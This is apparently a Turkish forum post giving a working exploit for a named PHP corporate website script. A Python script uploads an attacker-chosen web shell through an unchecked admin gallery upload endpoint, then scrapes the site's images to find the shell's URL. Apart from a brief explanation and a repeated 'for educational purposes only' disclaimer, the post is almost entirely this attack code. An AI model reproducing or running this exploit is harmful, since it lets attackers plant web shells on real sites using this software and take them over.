Her veri alışverişinde güvenli bir şekilde pdo kullanmış olsalar dahi bir dosyada unuttukları kontrol önlemi yüzünden sisteme shell yükleyebilmekteyiz.
İlgili script: https://www.phpscripttr.com/yeni-kurumsal-firma-scripti-indir-2020/
Exploit:
Not: Sadece eğitim amaçlıdır. Yasadışı işlemlerden sorumluluk kabul etmemekteyim.
İlgili script: https://www.phpscripttr.com/yeni-kurumsal-firma-scripti-indir-2020/
Exploit:
Python:
import requests
from bs4 import BeautifulSoup
url = "http://localhost" # Burayı domain ile değiştir.
shell = "alfa.php" # Buradan shell seç - Exploit ile Shell aynı dizinde olmalıdır.
dosya = {"file": open(shell, "rb")}
yukle = requests.post(url+"/admin/inc/galeri/logo.php", files=dosya)
goster = requests.get(url)
kaynak = BeautifulSoup(goster.content,"lxml")
resimler = kaynak.find_all("img")
for i in resimler:
if (i["src"].split(".")[1] == shell.split(".")[1]):
print(url+"/"+i["src"])Not: Sadece eğitim amaçlıdır. Yasadışı işlemlerden sorumluluk kabul etmemekteyim.
Exploit yazmayı bile başladın, tebrik ederim.
